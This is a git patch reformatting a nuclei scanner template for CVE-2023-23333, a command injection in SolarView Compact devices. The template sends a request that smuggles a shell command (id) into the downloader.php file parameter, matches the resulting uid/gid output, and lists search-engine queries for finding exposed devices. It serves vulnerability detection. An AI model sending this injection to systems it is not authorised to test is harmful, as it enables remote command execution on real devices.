From c4a8a6bd84f5fcded64322bd84f18c4b04163629 Mon Sep 17 00:00:00 2001
From: Dhiyaneshwaran <leedhiyanesh@gmail.com>
Date: Fri, 16 Jun 2023 21:44:16 +0530
Subject: [PATCH] fix formatting

---
 http/cves/2023/CVE-2023-23333.yaml | 23 ++++++++++++++---------
 1 file changed, 14 insertions(+), 9 deletions(-)

diff --git a/http/cves/2023/CVE-2023-23333.yaml b/http/cves/2023/CVE-2023-23333.yaml
index 7b95143989..20f04ad4d7 100644
--- a/http/cves/2023/CVE-2023-23333.yaml
+++ b/http/cves/2023/CVE-2023-23333.yaml
@@ -20,8 +20,8 @@ info:
     max-request: 1
     shodan-query: http.html:"SolarView Compact"
     fofa-query: body="SolarView Compact" && title="Top"
-    verified: true
-  tags: injection,solarview,edb,packetstorm,cve,cve2023,rce
+    verified: "true"
+  tags: cve,cve2023,solarview,rce
 
 variables:
   cmd: "id"
@@ -32,14 +32,19 @@ http:
         @timeout: 25s
         GET /downloader.php?file=%3B{{cmd}}%00.zip HTTP/1.1
         Host: {{Hostname}}
-        Accept-Charset: utf-8
-        Accept-Encoding: gzip, deflate
-        Connection: close
 
+    matchers-condition: and
     matchers:
-      - type: word
+      - type: regex
         part: body
+        regex:
+          - 'uid=\d+\(([^)]+)\) gid=\d+\(([^)]+)\)'
+
+      - type: word
+        part: header
         words:
-          - "uid="
-          - "gid="
-        condition: and
+          - "text/html"
+
+      - type: status
+        status:
+          - 200